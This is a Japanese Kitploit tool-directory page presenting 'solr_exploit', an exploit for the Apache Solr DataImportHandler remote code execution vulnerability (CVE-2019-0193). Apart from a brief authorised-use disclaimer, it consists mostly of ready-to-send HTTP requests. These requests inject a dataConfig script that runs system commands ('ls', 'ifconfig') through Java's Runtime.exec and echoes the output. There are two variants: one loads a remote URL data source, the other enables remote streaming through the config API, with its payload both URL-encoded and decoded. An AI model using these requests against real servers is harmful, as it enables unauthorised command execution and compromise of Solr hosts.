Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
solr_exploit — Apache Solrリモートコード実行脆弱性(CVE-2019-0193) エクスプロイト | Kitploit
ツール/GitHubGitHub/1135/solr_exploit
脆弱性分析エクスプロイトウェブアプリケーション悪用コマンド&コントロールリモートアクセスツール
GitHub1135/solr_exploit

solr_exploit

Apache Solrリモートコード実行脆弱性(CVE-2019-0193) エクスプロイト

リポジトリを見る
651426年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

免責事項

ここで提供する脆弱性検出方法、ファイル等の内容は、すべてセキュリティ従事者が法的な許可を得た場合にのみ使用し、許可されたサーバーの安全性を検出することを目的としています。セキュリティ従事者は法律を遵守し、許可なく脆弱性検出を行うことを禁止します。

はじめに

脆弱性分析 - Apache Solr リモートコード実行脆弱性(CVE-2019-0193) - 先知社区

理論的には様々な異なるタイプのデータソースを使用してExploitを構築できます。

Exploit1はデータソースタイプURLDataSourceを使用

Exploit2はデータソースタイプ ContentStreamDataSourceを使用

脆弱性検出 - Exploit1

Exploit1はデータソースタイプURLDataSourceを使用

利点: 結果のエコーバック、Solr低バージョンの検出をサポート

欠点: 外部ネットワークへのアクセスが必要

ステップ1

URLDataSourceタイプのデータソースを構築します(Solrサーバーがそのデータソースにアクセスします)。これは直接使用できます。

https://raw.githubusercontent.com/1135/solr_exploit/master/URLDataSource/demo.xml

ドキュメントdemo.xmlはタイプのデータソースであり、無害な通常のXMLドキュメントです。

URLDataSource

ドキュメントにはitem要素が1つだけあり、コマンドを1回だけ実行するようにしています。

自分でWebサーバーを起動してドキュメントdemo.xmlをホストすることもできます。コマンド: live-server --port=5555 アドレス: http://127.0.0.1:5555/demo.xml

ステップ2

Solr内のすべてのインデックスライブラリ(コア)の名前を取得する

root@kitploit:~
http://{xx.com:80}/solr/admin/cores

HTTP応答 JSONデータ すべてのインデックスライブラリ(コア)の名前が含まれます

"name":"xxxx"

ステップ3

そのインデックスライブラリがDataImportHandlerモジュールを使用しているかどうかを判断する

方法1

root@kitploit:~
アクセス
http://{xx.com:80}/solr/{core_name}/admin/mbeans?cat=QUERY&wt=json

DataImportHandlerモジュールを使用している場合、HTTP応答内に以下が含まれます:
org.apache.solr.handler.dataimport.DataImportHandler

そうでなければ、DataImportHandlerモジュールを使用していないことを示します(この脆弱性の影響を受けません)

方法2

root@kitploit:~
アクセス
http://{xx.com:80}/solr/#/{core_name}/dataimport

このSolrサーバーがdataimport-handlerモジュールを使用していない場合(この脆弱性の影響を受けません)、HTTP応答に次のヒントが表示されます:
sorry, no dataimport-handler defined!

そうでなければ、DataImportHandlerモジュールを使用していることを示します(この脆弱性の影響を受けます)

ステップ4 HTTPリクエストの構築

コマンドを実行すると、HTTPレスポンスに実行結果がエコーバックされます。複数行の結果をサポートします(各行は\n\rで終了します)。

注意: 以下のリクエストURL内の文字列"tika"をインデックスライブラリの名前に置き換えてください。

root@kitploit:~
POST /solr/tika/dataimport HTTP/1.1
Host: solr.com:8983
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://solr.com:8983/solr/
Content-type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 1231
Connection: close

command=full-import&verbose=false&clean=false&commit=false&debug=true&core=tika&name=dataimport&dataConfig=
<dataConfig>


  <dataSource type="URLDataSource"/>
  <script><![CDATA[

          function poc(row){

 var bufReader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("ls").getInputStream()));

var result = [];

while(true) {
var oneline = bufReader.readLine();
result.push( oneline );
if(!oneline) break;
}

row.put("title",result.join("\n\r"));

return row;

}


  ]]></script>

        <document>
             <entity name="entity1"
                     url="https://raw.githubusercontent.com/1135/solr_exploit/master/URLDataSource/demo.xml"
                     processor="XPathEntityProcessor"
                     forEach="/RDF/item"
                     transformer="script:poc">
                        <field column="title" xpath="/RDF/item/title" />
             </entity>
        </document>
</dataConfig>

脆弱性検出 - Exploit2

Exploit2はデータソースタイプ ContentStreamDataSourceを使用

利点: 結果のエコーバック、外部ネットワーク不要

欠点: 低バージョンでは検出不可 - POSTリクエストによるconfigoverlay.jsonファイルの設定変更が失敗するため

ステップ1-3

ステップ1は省略

ステップ2-3は同上

ステップ4

このステップでは、configoverlay.jsonファイルの設定を変更して、リモートストリームに関連するオプション .enableStreamBody .enableRemoteStreaming を有効にします。

tikaをインデックスライブラリ名に置き換えてください。

root@kitploit:~
POST /solr/tika/config HTTP/1.1
Host: 127.0.0.1
Accept: */*
Content-type:application/json
Content-Length: 159
Connection: close

{"set-property": {"requestDispatcher.requestParsers.enableRemoteStreaming": true}, "set-property": {"requestDispatcher.requestParsers.enableStreamBody": true}}

応答200で成功(実際のテストでは8.1で成功)

応答500で失敗(実際のテストでは、一部の低バージョンで失敗します)

ステップ5

リクエストを送信し、システムコマンドifconfigを実行してエコーバックを取得します(外部接続は一切不要)

root@kitploit:~
POST /solr/tika/dataimport?command=full-import&verbose=false&clean=false&commit=false&debug=true&core=tika&name=dataimport&dataConfig=%0a%3c%64%61%74%61%43%6f%6e%66%69%67%3e%0a%3c%64%61%74%61%53%6f%75%72%63%65%20%6e%61%6d%65%3d%22%73%74%72%65%61%6d%73%72%63%22%20%74%79%70%65%3d%22%43%6f%6e%74%65%6e%74%53%74%72%65%61%6d%44%61%74%61%53%6f%75%72%63%65%22%20%6c%6f%67%67%65%72%4c%65%76%65%6c%3d%22%54%52%41%43%45%22%20%2f%3e%0a%0a%20%20%3c%73%63%72%69%70%74%3e%3c%21%5b%43%44%41%54%41%5b%0a%20%20%20%20%20%20%20%20%20%20%66%75%6e%63%74%69%6f%6e%20%70%6f%63%28%72%6f%77%29%7b%0a%20%76%61%72%20%62%75%66%52%65%61%64%65%72%20%3d%20%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%42%75%66%66%65%72%65%64%52%65%61%64%65%72%28%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%49%6e%70%75%74%53%74%72%65%61%6d%52%65%61%64%65%72%28%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22%69%66%63%6f%6e%66%69%67%22%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%29%3b%0a%0a%76%61%72%20%72%65%73%75%6c%74%20%3d%20%5b%5d%3b%0a%0a%77%68%69%6c%65%28%74%72%75%65%29%20%7b%0a%76%61%72%20%6f%6e%65%6c%69%6e%65%20%3d%20%62%75%66%52%65%61%64%65%72%2e%72%65%61%64%4c%69%6e%65%28%29%3b%0a%72%65%73%75%6c%74%2e%70%75%73%68%28%20%6f%6e%65%6c%69%6e%65%20%29%3b%0a%69%66%28%21%6f%6e%65%6c%69%6e%65%29%20%62%72%65%61%6b%3b%0a%7d%0a%0a%72%6f%77%2e%70%75%74%28%22%74%69%74%6c%65%22%2c%72%65%73%75%6c%74%2e%6a%6f%69%6e%28%22%5c%6e%5c%72%22%29%29%3b%0a%72%65%74%75%72%6e%20%72%6f%77%3b%0a%0a%7d%0a%0a%5d%5d%3e%3c%2f%73%63%72%69%70%74%3e%0a%0a%3c%64%6f%63%75%6d%65%6e%74%3e%0a%20%20%20%20%3c%65%6e%74%69%74%79%0a%20%20%20%20%20%20%20%20%73%74%72%65%61%6d%3d%22%74%72%75%65%22%0a%20%20%20%20%20%20%20%20%6e%61%6d%65%3d%22%65%6e%74%69%74%79%31%22%0a%20%20%20%20%20%20%20%20%64%61%74%61%73%6f%75%72%63%65%3d%22%73%74%72%65%61%6d%73%72%63%31%22%0a%20%20%20%20%20%20%20%20%70%72%6f%63%65%73%73%6f%72%3d%22%58%50%61%74%68%45%6e%74%69%74%79%50%72%6f%63%65%73%73%6f%72%22%0a%20%20%20%20%20%20%20%20%72%6f%6f%74%45%6e%74%69%74%79%3d%22%74%72%75%65%22%0a%20%20%20%20%20%20%20%20%66%6f%72%45%61%63%68%3d%22%2f%52%44%46%2f%69%74%65%6d%22%0a%20%20%20%20%20%20%20%20%74%72%61%6e%73%66%6f%72%6d%65%72%3d%22%73%63%72%69%70%74%3a%70%6f%63%22%3e%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%3c%66%69%65%6c%64%20%63%6f%6c%75%6d%6e%3d%22%74%69%74%6c%65%22%20%78%70%61%74%68%3d%22%2f%52%44%46%2f%69%74%65%6d%2f%74%69%74%6c%65%22%20%2f%3e%0a%20%20%20%20%3c%2f%65%6e%74%69%74%79%3e%0a%3c%2f%64%6f%63%75%6d%65%6e%74%3e%0a%3c%2f%64%61%74%61%43%6f%6e%66%69%67%3e%0a%20%20%20%20%0a%20%20%20%20%20%20%20%20%20%20%20 HTTP/1.1
Host: solr.com:8983
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://solr.com:8983/solr/
Content-Length: 212
content-type: multipart/form-data; boundary=------------------------aceb88c2159f183f


--------------------------aceb88c2159f183f
Content-Disposition: form-data; name="stream.body"

<?xml version="1.0" encoding="UTF-8"?>
<RDF>
<item/>
</RDF>

--------------------------aceb88c2159f183f--

注意: dataConfigの値は、URLエンコード前は以下の文字列です

root@kitploit:~

<dataConfig>
<dataSource name="streamsrc" type="ContentStreamDataSource" loggerLevel="TRACE" />

  <script><![CDATA[
          function poc(row){
 var bufReader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("ifconfig").getInputStream()));

var result = [];

while(true) {
var oneline = bufReader.readLine();
result.push( oneline );
if(!oneline) break;
}

row.put("title",result.join("\n\r"));
return row;

}

]]></script>

<document>
    <entity
        stream="true"
        name="entity1"
        datasource="streamsrc1"
        processor="XPathEntityProcessor"
        rootEntity="true"
        forEach="/RDF/item"
        transformer="script:poc">
             <field column="title" xpath="/RDF/item/title" />
    </entity>
</document>
</dataConfig>
ツールをダウンロード